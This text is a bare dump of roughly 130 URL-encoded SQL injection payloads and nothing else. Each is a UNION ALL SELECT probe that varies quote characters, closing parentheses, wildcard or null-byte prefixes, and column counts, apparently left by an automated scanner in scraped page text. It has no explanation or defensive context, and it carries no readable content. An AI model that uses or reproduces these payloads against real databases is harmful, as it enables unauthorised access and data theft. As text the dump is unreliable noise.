-9277%27%29%29%20UNION%20ALL%20SELECT%209181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181%2C9181--%20 -8433%27%29%29%20UNION%20ALL%20SELECT%203196%2C3196%2C3196%2C3196%2C3196%2C3196%2C3196%2C3196%2C3196%2C3196%2C3196%2C3196%2C3196%2C3196%2C3196%2C3196%2C3196%2C3196%2C3196%2C3196--%20 -7572%27%29%29%29%20UNION%20ALL%20SELECT%205336%2C5336%2C5336%2C5336%2C5336%2C5336%2C5336%2C5336%2C5336%2C5336%2C5336--%20 -1337%27%29%29%29%20UNION%20ALL%20SELECT%209911%2C9911%2C9911%2C9911%2C9911%2C9911%2C9911%2C9911%2C9911%2C9911%2C9911%2C9911--%20 -1751%27%29%29%29%20UNION%20ALL%20SELECT%202356%2C2356%2C2356%2C2356%2C2356%2C2356%2C2356%2C2356%2C2356%2C2356%2C2356%2C2356%2C2356--%20 -4817%27%29%29%29%20UNION%20ALL%20SELECT%209874%2C9874%2C9874%2C9874%2C9874%2C9874%2C9874%2C9874%2C9874%2C9874%2C9874%2C9874%2C9874%2C9874--%20 -6299%27%29%29%29%20UNION%20ALL%20SELECT%208350%2C8350%2C8350%2C8350%2C8350%2C8350%2C8350%2C8350%2C8350%2C8350%2C8350%2C8350%2C8350%2C8350%2C8350--%20 -7992%27%29%29%29%20UNION%20ALL%20SELECT%204450%2C4450%2C4450%2C4450%2C4450%2C4450%2C4450%2C4450%2C4450%2C4450%2C4450%2C4450%2C4450%2C4450%2C4450%2C4450--%20 -8609%27%29%29%29%20UNION%20ALL%20SELECT%205113%2C5113%2C5113%2C5113%2C5113%2C5113%2C5113%2C5113%2C5113%2C5113%2C5113%2C5113%2C5113%2C5113%2C5113%2C5113%2C5113--%20 -3101%27%29%29%29%20UNION%20ALL%20SELECT%201492%2C1492%2C1492%2C1492%2C1492%2C1492%2C1492%2C1492%2C1492%2C1492%2C1492%2C1492%2C1492%2C1492%2C1492%2C1492%2C1492%2C1492--%20 -9354%27%29%29%29%20UNION%20ALL%20SELECT%207728%2C7728%2C7728%2C7728%2C7728%2C7728%2C7728%2C7728%2C7728%2C7728%2C7728%2C7728%2C7728%2C7728%2C7728%2C7728%2C7728%2C7728%2C7728--%20 -2253%27%29%29%29%20UNION%20ALL%20SELECT%208098%2C8098%2C8098%2C8098%2C8098%2C8098%2C8098%2C8098%2C8098%2C8098%2C8098%2C8098%2C8098%2C8098%2C8098%2C8098%2C8098%2C8098%2C8098%2C8098--%20 -4502%27%20UNION%20ALL%20SELECT%207444%2C7444%2C7444%2C7444%2C7444%2C7444%2C7444%2C7444%2C7444%2C7444%2C7444--%20 -3445%27%20UNION%20ALL%20SELECT%208447%2C8447%2C8447%2C8447%2C8447%2C8447%2C8447%2C8447%2C8447%2C8447%2C8447%2C8447--%20 -9858%27%20UNION%20ALL%20SELECT%203879%2C3879%2C3879%2C3879%2C3879%2C3879%2C3879%2C3879%2C3879%2C3879%2C3879%2C3879%2C3879--%20 -2785%27%20UNION%20ALL%20SELECT%204864%2C4864%2C4864%2C4864%2C4864%2C4864%2C4864%2C4864%2C4864%2C4864%2C4864%2C4864%2C4864%2C4864--%20 -2242%27%20UNION%20ALL%20SELECT%207465%2C7465%2C7465%2C7465%2C7465%2C7465%2C7465%2C7465%2C7465%2C7465%2C7465%2C7465%2C7465%2C7465%2C7465--%20 -3467%27%20UNION%20ALL%20SELECT%204972%2C4972%2C4972%2C4972%2C4972%2C4972%2C4972%2C4972%2C4972%2C4972%2C4972%2C4972%2C4972%2C4972%2C4972%2C4972--%20 -2207%27%20UNION%20ALL%20SELECT%203395%2C3395%2C3395%2C3395%2C3395%2C3395%2C3395%2C3395%2C3395%2C3395%2C3395%2C3395%2C3395%2C3395%2C3395%2C3395%2C3395--%20 -8062%27%20UNION%20ALL%20SELECT%204280%2C4280%2C4280%2C4280%2C4280%2C4280%2C4280%2C4280%2C4280%2C4280%2C4280%2C4280%2C4280%2C4280%2C4280%2C4280%2C4280%2C4280--%20 -1438%27%20UNION%20ALL%20SELECT%201798%2C1798%2C1798%2C1798%2C1798%2C1798%2C1798%2C1798%2C1798%2C1798%2C1798%2C1798%2C1798%2C1798%2C1798%2C1798%2C1798%2C1798%2C1798--%20 -9325%27%20UNION%20ALL%20SELECT%204872%2C4872%2C4872%2C4872%2C4872%2C4872%2C4872%2C4872%2C4872%2C4872%2C4872%2C4872%2C4872%2C4872%2C4872%2C4872%2C4872%2C4872%2C4872%2C4872--%20 -2247%22%29%20UNION%20ALL%20SELECT%203322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322%2C3322--%20 -1777%22%29%20UNION%20ALL%20SELECT%207331%2C7331%2C7331%2C7331%2C7331%2C7331%2C7331%2C7331%2C7331%2C7331%2C7331%2C7331--%20 -4183%22%29%20UNION%20ALL%20SELECT%202339%2C2339%2C2339%2C2339%2C2339%2C2339%2C2339%2C2339%2C2339%2C2339%2C2339%2C2339%2C2339--%20 -9654%22%29%20UNION%20ALL%20SELECT%206351%2C6351%2C6351%2C6351%2C6351%2C6351%2C6351%2C6351%2C6351%2C6351%2C6351%2C6351%2C6351%2C6351--%20 -2054%22%29%20UNION%20ALL%20SELECT%203524%2C3524%2C3524%2C3524%2C3524%2C3524%2C3524%2C3524%2C3524%2C3524%2C3524%2C3524%2C3524%2C3524%2C3524--%20 -4138%22%29%20UNION%20ALL%20SELECT%204203%2C4203%2C4203%2C4203%2C4203%2C4203%2C4203%2C4203%2C4203%2C4203%2C4203%2C4203%2C4203%2C4203%2C4203%2C4203--%20 -6800%22%29%20UNION%20ALL%20SELECT%203785%2C3785%2C3785%2C3785%2C3785%2C3785%2C3785%2C3785%2C3785%2C3785%2C3785%2C3785%2C3785%2C3785%2C3785%2C3785%2C3785--%20 -6673%22%29%20UNION%20ALL%20SELECT%208788%2C8788%2C8788%2C8788%2C8788%2C8788%2C8788%2C8788%2C8788%2C8788%2C8788%2C8788%2C8788%2C8788%2C8788%2C8788%2C8788%2C8788--%20 -6335%22%29%20UNION%20ALL%20SELECT%203059%2C3059%2C3059%2C3059%2C3059%2C3059%2C3059%2C3059%2C3059%2C3059%2C3059%2C3059%2C3059%2C3059%2C3059%2C3059%2C3059%2C3059%2C3059--%20 -5559%22%29%20UNION%20ALL%20SELECT%209768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768--%20 -3227%22%29%29%20UNION%20ALL%20SELECT%203333%2C3333%2C3333%2C3333%2C3333%2C3333%2C3333%2C3333%2C3333%2C3333%2C3333--%20 -3938%22%29%29%20UNION%20ALL%20SELECT%206919%2C6919%2C6919%2C6919%2C6919%2C6919%2C6919%2C6919%2C6919%2C6919%2C6919%2C6919--%20 -9976%22%29%29%20UNION%20ALL%20SELECT%208435%2C8435%2C8435%2C8435%2C8435%2C8435%2C8435%2C8435%2C8435%2C8435%2C8435%2C8435%2C8435--%20 -8709%22%29%29%20UNION%20ALL%20SELECT%205005%2C5005%2C5005%2C5005%2C5005%2C5005%2C5005%2C5005%2C5005%2C5005%2C5005%2C5005%2C5005%2C5005--%20 -3709%22%29%29%20UNION%20ALL%20SELECT%208748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748--%20 -9630%22%29%29%20UNION%20ALL%20SELECT%209823%2C9823%2C9823%2C9823%2C9823%2C9823%2C9823%2C9823%2C9823%2C9823%2C9823%2C9823%2C9823%2C9823%2C9823%2C9823--%20 -6568%22%29%29%20UNION%20ALL%20SELECT%202606%2C2606%2C2606%2C2606%2C2606%2C2606%2C2606%2C2606%2C2606%2C2606%2C2606%2C2606%2C2606%2C2606%2C2606%2C2606%2C2606--%20 -6623%22%29%29%20UNION%20ALL%20SELECT%207210%2C7210%2C7210%2C7210%2C7210%2C7210%2C7210%2C7210%2C7210%2C7210%2C7210%2C7210%2C7210%2C7210%2C7210%2C7210%2C7210%2C7210--%20 -3644%22%29%29%20UNION%20ALL%20SELECT%205727%2C5727%2C5727%2C5727%2C5727%2C5727%2C5727%2C5727%2C5727%2C5727%2C5727%2C5727%2C5727%2C5727%2C5727%2C5727%2C5727%2C5727%2C5727--%20 -6897%22%29%29%20UNION%20ALL%20SELECT%208151%2C8151%2C8151%2C8151%2C8151%2C8151%2C8151%2C8151%2C8151%2C8151%2C8151%2C8151%2C8151%2C8151%2C8151%2C8151%2C8151%2C8151%2C8151%2C8151--%20 -6039%22%29%29%29%20UNION%20ALL%20SELECT%201363%2C1363%2C1363%2C1363%2C1363%2C1363%2C1363%2C1363%2C1363%2C1363%2C1363--%20 -9712%22%29%29%29%20UNION%20ALL%20SELECT%207742%2C7742%2C7742%2C7742%2C7742%2C7742%2C7742%2C7742%2C7742%2C7742%2C7742%2C7742--%20 -9774%22%29%29%29%20UNION%20ALL%20SELECT%206822%2C6822%2C6822%2C6822%2C6822%2C6822%2C6822%2C6822%2C6822%2C6822%2C6822%2C6822%2C6822--%20 -4620%22%29%29%29%20UNION%20ALL%20SELECT%208412%2C8412%2C8412%2C8412%2C8412%2C8412%2C8412%2C8412%2C8412%2C8412%2C8412%2C8412%2C8412%2C8412--%20 -3951%22%29%29%29%20UNION%20ALL%20SELECT%209877%2C9877%2C9877%2C9877%2C9877%2C9877%2C9877%2C9877%2C9877%2C9877%2C9877%2C9877%2C9877%2C9877%2C9877--%20 -7935%22%29%29%29%20UNION%20ALL%20SELECT%203416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416--%20 -8354%22%29%29%29%20UNION%20ALL%20SELECT%209023%2C9023%2C9023%2C9023%2C9023%2C9023%2C9023%2C9023%2C9023%2C9023%2C9023%2C9023%2C9023%2C9023%2C9023%2C9023%2C9023--%20 -9932%22%29%29%29%20UNION%20ALL%20SELECT%207752%2C7752%2C7752%2C7752%2C7752%2C7752%2C7752%2C7752%2C7752%2C7752%2C7752%2C7752%2C7752%2C7752%2C7752%2C7752%2C7752%2C7752--%20 -8037%22%29%29%29%20UNION%20ALL%20SELECT%205391%2C5391%2C5391%2C5391%2C5391%2C5391%2C5391%2C5391%2C5391%2C5391%2C5391%2C5391%2C5391%2C5391%2C5391%2C5391%2C5391%2C5391%2C5391--%20 -6551%22%29%29%29%20UNION%20ALL%20SELECT%209717%2C9717%2C9717%2C9717%2C9717%2C9717%2C9717%2C9717%2C9717%2C9717%2C9717%2C9717%2C9717%2C9717%2C9717%2C9717%2C9717%2C9717%2C9717%2C9717--%20 -7933%22%20UNION%20ALL%20SELECT%204270%2C4270%2C4270%2C4270%2C4270%2C4270%2C4270%2C4270%2C4270%2C4270%2C4270--%20 -8170%22%20UNION%20ALL%20SELECT%201167%2C1167%2C1167%2C1167%2C1167%2C1167%2C1167%2C1167%2C1167%2C1167%2C1167%2C1167--%20 -3645%22%20UNION%20ALL%20SELECT%201683%2C1683%2C1683%2C1683%2C1683%2C1683%2C1683%2C1683%2C1683%2C1683%2C1683%2C1683%2C1683--%20 -5486%22%20UNION%20ALL%20SELECT%206681%2C6681%2C6681%2C6681%2C6681%2C6681%2C6681%2C6681%2C6681%2C6681%2C6681%2C6681%2C6681%2C6681--%20 -9433%22%20UNION%20ALL%20SELECT%206928%2C6928%2C6928%2C6928%2C6928%2C6928%2C6928%2C6928%2C6928%2C6928%2C6928%2C6928%2C6928%2C6928%2C6928--%20 -7348%22%20UNION%20ALL%20SELECT%208439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439%2C8439--%20 -2813%22%20UNION%20ALL%20SELECT%209793%2C9793%2C9793%2C9793%2C9793%2C9793%2C9793%2C9793%2C9793%2C9793%2C9793%2C9793%2C9793%2C9793%2C9793%2C9793%2C9793--%20 -7971%22%20UNION%20ALL%20SELECT%203890%2C3890%2C3890%2C3890%2C3890%2C3890%2C3890%2C3890%2C3890%2C3890%2C3890%2C3890%2C3890%2C3890%2C3890%2C3890%2C3890%2C3890--%20 -8029%22%20UNION%20ALL%20SELECT%207524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524--%20 -9094%22%20UNION%20ALL%20SELECT%209116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116--%20 -9647%22%29%20UNION%20ALL%20SELECT%204185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185%2C4185--%20 -3954%22%29%20UNION%20ALL%20SELECT%203135%2C3135%2C3135%2C3135%2C3135%2C3135%2C3135%2C3135%2C3135%2C3135%2C3135%2C3135--%20 -2556%22%29%20UNION%20ALL%20SELECT%208537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537%2C8537--%20 -6670%22%29%20UNION%20ALL%20SELECT%207182%2C7182%2C7182%2C7182%2C7182%2C7182%2C7182%2C7182%2C7182%2C7182%2C7182%2C7182%2C7182%2C7182--%20 -4232%22%29%20UNION%20ALL%20SELECT%205385%2C5385%2C5385%2C5385%2C5385%2C5385%2C5385%2C5385%2C5385%2C5385%2C5385%2C5385%2C5385%2C5385%2C5385--%20 -8219%22%29%20UNION%20ALL%20SELECT%209584%2C9584%2C9584%2C9584%2C9584%2C9584%2C9584%2C9584%2C9584%2C9584%2C9584%2C9584%2C9584%2C9584%2C9584%2C9584--%20 -2386%22%29%20UNION%20ALL%20SELECT%204778%2C4778%2C4778%2C4778%2C4778%2C4778%2C4778%2C4778%2C4778%2C4778%2C4778%2C4778%2C4778%2C4778%2C4778%2C4778%2C4778--%20 -8455%22%29%20UNION%20ALL%20SELECT%202987%2C2987%2C2987%2C2987%2C2987%2C2987%2C2987%2C2987%2C2987%2C2987%2C2987%2C2987%2C2987%2C2987%2C2987%2C2987%2C2987%2C2987--%20 -5648%22%29%20UNION%20ALL%20SELECT%205901%2C5901%2C5901%2C5901%2C5901%2C5901%2C5901%2C5901%2C5901%2C5901%2C5901%2C5901%2C5901%2C5901%2C5901%2C5901%2C5901%2C5901%2C5901--%20 -7924%22%29%20UNION%20ALL%20SELECT%207227%2C7227%2C7227%2C7227%2C7227%2C7227%2C7227%2C7227%2C7227%2C7227%2C7227%2C7227%2C7227%2C7227%2C7227%2C7227%2C7227%2C7227%2C7227%2C7227--%20 -4794%22%29%29%20UNION%20ALL%20SELECT%202898%2C2898%2C2898%2C2898%2C2898%2C2898%2C2898%2C2898%2C2898%2C2898%2C2898--%20 -7518%22%29%29%20UNION%20ALL%20SELECT%208426%2C8426%2C8426%2C8426%2C8426%2C8426%2C8426%2C8426%2C8426%2C8426%2C8426%2C8426--%20 -3990%22%29%29%20UNION%20ALL%20SELECT%208046%2C8046%2C8046%2C8046%2C8046%2C8046%2C8046%2C8046%2C8046%2C8046%2C8046%2C8046%2C8046--%20 -5840%22%29%29%20UNION%20ALL%20SELECT%207786%2C7786%2C7786%2C7786%2C7786%2C7786%2C7786%2C7786%2C7786%2C7786%2C7786%2C7786%2C7786%2C7786--%20 -7273%22%29%29%20UNION%20ALL%20SELECT%209376%2C9376%2C9376%2C9376%2C9376%2C9376%2C9376%2C9376%2C9376%2C9376%2C9376%2C9376%2C9376%2C9376%2C9376--%20 -2227%22%29%29%20UNION%20ALL%20SELECT%209010%2C9010%2C9010%2C9010%2C9010%2C9010%2C9010%2C9010%2C9010%2C9010%2C9010%2C9010%2C9010%2C9010%2C9010%2C9010--%20 -3607%22%29%29%20UNION%20ALL%20SELECT%206835%2C6835%2C6835%2C6835%2C6835%2C6835%2C6835%2C6835%2C6835%2C6835%2C6835%2C6835%2C6835%2C6835%2C6835%2C6835%2C6835--%20 -1814%22%29%29%20UNION%20ALL%20SELECT%201870%2C1870%2C1870%2C1870%2C1870%2C1870%2C1870%2C1870%2C1870%2C1870%2C1870%2C1870%2C1870%2C1870%2C1870%2C1870%2C1870%2C1870--%20 -6627%22%29%29%20UNION%20ALL%20SELECT%202746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746--%20 -5111%22%29%29%20UNION%20ALL%20SELECT%204943%2C4943%2C4943%2C4943%2C4943%2C4943%2C4943%2C4943%2C4943%2C4943%2C4943%2C4943%2C4943%2C4943%2C4943%2C4943%2C4943%2C4943%2C4943%2C4943--%20 -4182%22%29%29%29%20UNION%20ALL%20SELECT%206739%2C6739%2C6739%2C6739%2C6739%2C6739%2C6739%2C6739%2C6739%2C6739%2C6739--%20 -8623%22%29%29%29%20UNION%20ALL%20SELECT%208895%2C8895%2C8895%2C8895%2C8895%2C8895%2C8895%2C8895%2C8895%2C8895%2C8895%2C8895--%20 -8427%22%29%29%29%20UNION%20ALL%20SELECT%203936%2C3936%2C3936%2C3936%2C3936%2C3936%2C3936%2C3936%2C3936%2C3936%2C3936%2C3936%2C3936--%20 -3277%22%29%29%29%20UNION%20ALL%20SELECT%202114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114--%20 -7613%22%29%29%29%20UNION%20ALL%20SELECT%203596%2C3596%2C3596%2C3596%2C3596%2C3596%2C3596%2C3596%2C3596%2C3596%2C3596%2C3596%2C3596%2C3596%2C3596--%20 -3996%22%29%29%29%20UNION%20ALL%20SELECT%203975%2C3975%2C3975%2C3975%2C3975%2C3975%2C3975%2C3975%2C3975%2C3975%2C3975%2C3975%2C3975%2C3975%2C3975%2C3975--%20 -7399%22%29%29%29%20UNION%20ALL%20SELECT%206245%2C6245%2C6245%2C6245%2C6245%2C6245%2C6245%2C6245%2C6245%2C6245%2C6245%2C6245%2C6245%2C6245%2C6245%2C6245%2C6245--%20 -6374%22%29%29%29%20UNION%20ALL%20SELECT%208546%2C8546%2C8546%2C8546%2C8546%2C8546%2C8546%2C8546%2C8546%2C8546%2C8546%2C8546%2C8546%2C8546%2C8546%2C8546%2C8546%2C8546--%20 -4990%22%29%29%29%20UNION%20ALL%20SELECT%208895%2C8895%2C8895%2C8895%2C8895%2C8895%2C8895%2C8895%2C8895%2C8895%2C8895%2C8895%2C8895%2C8895%2C8895%2C8895%2C8895%2C8895%2C8895--%20 -7831%22%29%29%29%20UNION%20ALL%20SELECT%203128%2C3128%2C3128%2C3128%2C3128%2C3128%2C3128%2C3128%2C3128%2C3128%2C3128%2C3128%2C3128%2C3128%2C3128%2C3128%2C3128%2C3128%2C3128%2C3128--%20 -7666%22%20UNION%20ALL%20SELECT%202974%2C2974%2C2974%2C2974%2C2974%2C2974%2C2974%2C2974%2C2974%2C2974%2C2974--%20 -4822%22%20UNION%20ALL%20SELECT%204974%2C4974%2C4974%2C4974%2C4974%2C4974%2C4974%2C4974%2C4974%2C4974%2C4974%2C4974--%20 -6662%22%20UNION%20ALL%20SELECT%202955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955--%20 -7738%22%20UNION%20ALL%20SELECT%203893%2C3893%2C3893%2C3893%2C3893%2C3893%2C3893%2C3893%2C3893%2C3893%2C3893%2C3893%2C3893%2C3893--%20 -8887%22%20UNION%20ALL%20SELECT%206962%2C6962%2C6962%2C6962%2C6962%2C6962%2C6962%2C6962%2C6962%2C6962%2C6962%2C6962%2C6962%2C6962%2C6962--%20 -8397%22%20UNION%20ALL%20SELECT%206016%2C6016%2C6016%2C6016%2C6016%2C6016%2C6016%2C6016%2C6016%2C6016%2C6016%2C6016%2C6016%2C6016%2C6016%2C6016--%20 -1651%22%20UNION%20ALL%20SELECT%206728%2C6728%2C6728%2C6728%2C6728%2C6728%2C6728%2C6728%2C6728%2C6728%2C6728%2C6728%2C6728%2C6728%2C6728%2C6728%2C6728--%20 -1934%22%20UNION%20ALL%20SELECT%205955%2C5955%2C5955%2C5955%2C5955%2C5955%2C5955%2C5955%2C5955%2C5955%2C5955%2C5955%2C5955%2C5955%2C5955%2C5955%2C5955%2C5955--%20 -4573%22%20UNION%20ALL%20SELECT%203370%2C3370%2C3370%2C3370%2C3370%2C3370%2C3370%2C3370%2C3370%2C3370%2C3370%2C3370%2C3370%2C3370%2C3370%2C3370%2C3370%2C3370%2C3370--%20 -5377%22%20UNION%20ALL%20SELECT%203486%2C3486%2C3486%2C3486%2C3486%2C3486%2C3486%2C3486%2C3486%2C3486%2C3486%2C3486%2C3486%2C3486%2C3486%2C3486%2C3486%2C3486%2C3486%2C3486--%20 -9462%25%27%29%20UNION%20ALL%20SELECT%206338%2C6338%2C6338%2C6338%2C6338%2C6338%2C6338%2C6338%2C6338%2C6338%2C6338--%20 -9354%25%27%29%20UNION%20ALL%20SELECT%205370%2C5370%2C5370%2C5370%2C5370%2C5370%2C5370%2C5370%2C5370%2C5370%2C5370%2C5370--%20 -8150%25%27%29%20UNION%20ALL%20SELECT%207791%2C7791%2C7791%2C7791%2C7791%2C7791%2C7791%2C7791%2C7791%2C7791%2C7791%2C7791%2C7791--%20 -4504%25%27%29%20UNION%20ALL%20SELECT%208616%2C8616%2C8616%2C8616%2C8616%2C8616%2C8616%2C8616%2C8616%2C8616%2C8616%2C8616%2C8616%2C8616--%20 -5757%25%27%29%20UNION%20ALL%20SELECT%209369%2C9369%2C9369%2C9369%2C9369%2C9369%2C9369%2C9369%2C9369%2C9369%2C9369%2C9369%2C9369%2C9369%2C9369--%20 -3023%25%27%29%20UNION%20ALL%20SELECT%206942%2C6942%2C6942%2C6942%2C6942%2C6942%2C6942%2C6942%2C6942%2C6942%2C6942%2C6942%2C6942%2C6942%2C6942%2C6942--%20 -8645%25%27%29%20UNION%20ALL%20SELECT%208897%2C8897%2C8897%2C8897%2C8897%2C8897%2C8897%2C8897%2C8897%2C8897%2C8897%2C8897%2C8897%2C8897%2C8897%2C8897%2C8897--%20 -4599%25%27%29%20UNION%20ALL%20SELECT%203008%2C3008%2C3008%2C3008%2C3008%2C3008%2C3008%2C3008%2C3008%2C3008%2C3008%2C3008%2C3008%2C3008%2C3008%2C3008%2C3008%2C3008--%20 -9041%25%27%29%20UNION%20ALL%20SELECT%201471%2C1471%2C1471%2C1471%2C1471%2C1471%2C1471%2C1471%2C1471%2C1471%2C1471%2C1471%2C1471%2C1471%2C1471%2C1471%2C1471%2C1471%2C1471--%20 -9682%25%27%29%20UNION%20ALL%20SELECT%206002%2C6002%2C6002%2C6002%2C6002%2C6002%2C6002%2C6002%2C6002%2C6002%2C6002%2C6002%2C6002%2C6002%2C6002%2C6002%2C6002%2C6002%2C6002%2C6002--%20 -6363%25%27%29%29%20UNION%20ALL%20SELECT%201726%2C1726%2C1726%2C1726%2C1726%2C1726%2C1726%2C1726%2C1726%2C1726%2C1726--%20 -7179%25%27%29%29%20UNION%20ALL%20SELECT%205882%2C5882%2C5882%2C5882%2C5882%2C5882%2C5882%2C5882%2C5882%2C5882%2C5882%2C5882--%20 -6023%25%27%29%29%20UNION%20ALL%20SELECT%203266%2C3266%2C3266%2C3266%2C3266%2C3266%2C3266%2C3266%2C3266%2C3266%2C3266%2C3266%2C3266--%20 -2626%25%27%29%29%20UNION%20ALL%20SELECT%208885%2C8885%2C8885%2C8885%2C8885%2C8885%2C8885%2C8885%2C8885%2C8885%2C8885%2C8885%2C8885%2C8885--%20 -2735%25%27%29%29%20UNION%20ALL%20SELECT%202993%2C2993%2C2993%2C2993%2C2993%2C2993%2C2993%2C2993%2C2993%2C2993%2C2993%2C2993%2C2993%2C2993%2C2993--%20 -4714%25%27%29%29%20UNION%20ALL%20SELECT%208298%2C8298%2C8298%2C8298%2C8298%2C8298%2C8298%2C8298%2C8298%2C8298%2C8298%2C8298%2C8298%2C8298%2C8298%2C8298--%20 -2883%25%27%29%29%20UNION%20ALL%20SELECT%201038%2C1038%2C1038%2C1038%2C1038%2C1038%2C1038%2C1038%2C1038%2C1038%2C1038%2C1038%2C1038%2C1038%2C1038%2C1038%2C1038--%20 -3560%25%27%29%29%20UNION%20ALL%20SELECT%209757%2C9757%2C9757%2C9757%2C9757%2C9757%2C9757%2C9757%2C9757%2C9757%2C9757%2C9757%2C9757%2C9757%2C9757%2C9757%2C9757%2C9757--%20 -1004%25%27%29%29%20UNION%20ALL%20SELECT%209148%2C9148%2C9148%2C9148%2C9148%2C9148%2C9148%2C9148%2C9148%2C9148%2C9148%2C9148%2C9148%2C9148%2C9148%2C9148%2C9148%2C9148%2C9148--%20 -8860%25%27%29%29%20UNION%20ALL%20SELECT%206443%2C6443%2C6443%2C6443%2C6443%2C6443%2C6443%2C6443%2C6443%2C6443%2C6443%2C6443%2C6443%2C6443%2C6443%2C6443%2C6443%2C6443%2C6443%2C6443--%20 -2375%25%27%29%29%29%20UNION%20ALL%20SELECT%201145%2C1145%2C1145%2C1145%2C1145%2C1145%2C1145%2C1145%2C1145%2C1145%2C1145--%20 -9961%25%27%29%29%29%20UNION%20ALL%20SELECT%201597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597--%20 -1738%25%27%29%29%29%20UNION%20ALL%20SELECT%207933%2C7933%2C7933%2C7933%2C7933%2C7933%2C7933%2C7933%2C7933%2C7933%2C7933%2C7933%2C7933--%20 -7265%25%27%29%29%29%20UNION%20ALL%20SELECT%204163%2C4163%2C4163%2C4163%2C4163%2C4163%2C4163%2C4163%2C4163%2C4163%2C4163%2C4163%2C4163%2C4163--%20 -9307%25%27%29%29%29%20UNION%20ALL%20SELECT%205647%2C5647%2C5647%2C5647%2C5647%2C5647%2C5647%2C5647%2C5647%2C5647%2C5647%2C5647%2C5647%2C5647%2C5647--%20 -5840%25%27%29%29%29%20UNION%20ALL%20SELECT%202801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801--%20 -6149%25%27%29%29%29%20UNION%20ALL%20SELECT%201748%2C1748%2C1748%2C1748%2C1748%2C1748%2C1748%2C1748%2C1748%2C1748%2C1748%2C1748%2C1748%2C1748%2C1748%2C1748%2C1748--%20 -4465%25%27%29%29%29%20UNION%20ALL%20SELECT%206217%2C6217%2C6217%2C6217%2C6217%2C6217%2C6217%2C6217%2C6217%2C6217%2C6217%2C6217%2C6217%2C6217%2C6217%2C6217%2C6217%2C6217--%20 -6609%25%27%29%29%29%20UNION%20ALL%20SELECT%205014%2C5014%2C5014%2C5014%2C5014%2C5014%2C5014%2C5014%2C5014%2C5014%2C5014%2C5014%2C5014%2C5014%2C5014%2C5014%2C5014%2C5014%2C5014--%20 -2262%25%27%29%29%29%20UNION%20ALL%20SELECT%203806%2C3806%2C3806%2C3806%2C3806%2C3806%2C3806%2C3806%2C3806%2C3806%2C3806%2C3806%2C3806%2C3806%2C3806%2C3806%2C3806%2C3806%2C3806%2C3806--%20 -1687%25%27%20UNION%20ALL%20SELECT%201104%2C1104%2C1104%2C1104%2C1104%2C1104%2C1104%2C1104%2C1104%2C1104%2C1104--%20 -5386%25%27%20UNION%20ALL%20SELECT%209563%2C9563%2C9563%2C9563%2C9563%2C9563%2C9563%2C9563%2C9563%2C9563%2C9563%2C9563--%20 -7263%25%27%20UNION%20ALL%20SELECT%205693%2C5693%2C5693%2C5693%2C5693%2C5693%2C5693%2C5693%2C5693%2C5693%2C5693%2C5693%2C5693--%20 -3344%25%27%20UNION%20ALL%20SELECT%201692%2C1692%2C1692%2C1692%2C1692%2C1692%2C1692%2C1692%2C1692%2C1692%2C1692%2C1692%2C1692%2C1692--%20 -6990%25%27%20UNION%20ALL%20SELECT%209496%2C9496%2C9496%2C9496%2C9496%2C9496%2C9496%2C9496%2C9496%2C9496%2C9496%2C9496%2C9496%2C9496%2C9496--%20 -8530%25%27%20UNION%20ALL%20SELECT%204660%2C4660%2C4660%2C4660%2C4660%2C4660%2C4660%2C4660%2C4660%2C4660%2C4660%2C4660%2C4660%2C4660%2C4660%2C4660--%20 -5244%25%27%20UNION%20ALL%20SELECT%206368%2C6368%2C6368%2C6368%2C6368%2C6368%2C6368%2C6368%2C6368%2C6368%2C6368%2C6368%2C6368%2C6368%2C6368%2C6368%2C6368--%20 -1300%25%27%20UNION%20ALL%20SELECT%203837%2C3837%2C3837%2C3837%2C3837%2C3837%2C3837%2C3837%2C3837%2C3837%2C3837%2C3837%2C3837%2C3837%2C3837%2C3837%2C3837%2C3837--%20 -5426%25%27%20UNION%20ALL%20SELECT%208376%2C8376%2C8376%2C8376%2C8376%2C8376%2C8376%2C8376%2C8376%2C8376%2C8376%2C8376%2C8376%2C8376%2C8376%2C8376%2C8376%2C8376%2C8376--%20 -4000%25%27%20UNION%20ALL%20SELECT%209063%2C9063%2C9063%2C9063%2C9063%2C9063%2C9063%2C9063%2C9063%2C9063%2C9063%2C9063%2C9063%2C9063%2C9063%2C9063%2C9063%2C9063%2C9063%2C9063--%20 -6401%00%27%29%20UNION%20ALL%20SELECT%206599%2C6599%2C6599%2C6599%2C6599%2C6599%2C6599%2C6599%2C6599%2C6599%2C6599--%20 -1577%00%27%29%20UNION%20ALL%20SELECT%201856%2C1856%2C1856%2C1856%2C1856%2C1856%2C1856%2C1856%2C1856%2C1856%2C1856%2C1856--%20 